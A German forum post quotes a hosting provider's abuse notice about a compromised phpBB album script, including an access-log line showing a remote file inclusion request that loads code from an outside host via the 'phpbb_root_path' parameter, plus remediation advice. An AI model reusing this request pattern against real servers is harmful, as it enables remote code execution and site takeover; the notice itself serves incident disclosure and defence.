Mit solchen Idioten hatte ich letzte Woche auch zu tun:
Sehr geehrter Herr Schmidt,
wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer Zugriff auf Ihre Daten erhalten konnte.
Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.
Es handelt sich um das Script
"/language/lang_german/lang_main_album.php", welches über den Parameter "phpbb_root_path" die Ausführung beliebigen Codes erlaubt:
66.178.22.202 - - [10/Oct/2007:20:22:57 +0200] "POST //language/lang_german/lang_main_album.php?phpbb_root_path=
https://itfand
alucia.es/images.txt? HTTP/1.0" 200 6540
www.erotikversand69.de "
https://www.erotikversand69.de//languag ... _album.php
?phpbb_root_path=
https://itfandalucia.es/images.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "-"
Die in dem Verzeicnis befindlichen Scripte sind augenscheinlich alle trojanisiert worden. Aus diesem Grund haben wir das Verzeicnis gesperrt.
Ebenfalls manipuliert wurden anscheinend alle PHP-Dateien in Ihrem $HOME
(ctime: Oct 10 20:26:16 2007), welche wir ebenfalls gesperrt haben. Die Scripte sollten sämtliche entfernt werden.
Wir empfehlen Ihnen sich regelmäßig über Updates aller installierten Software zu informieren, z.B. über entsprechende Announce-Mailinglisten oder Foren des Herstellers. Insbesondere gilt dies auch für die Komponenten von Drittherstellern der verwendeten Applikationen. Diese sind mittlerweile ein gängiges Angriffsziel. Es werden mit Updates teilweise auch Lücken geschlossen, die nicht in den Release-Notes der Software verzeichnet sind. Verwenden Sie lediglich Programme aus vertrauenswürdigen Quellen.
Falls Sie selbstgeschriebene Scripte einsetzen, dann dürfte folgender Artikel ebenfalls von Interesse für Sie sein:
https://hilfe-center.1und1.de/server/ro ... ity/4.html
Ich habe danach gleich mal das ganze Script gelöscht, und auf die neue phpbb Version umgestellt.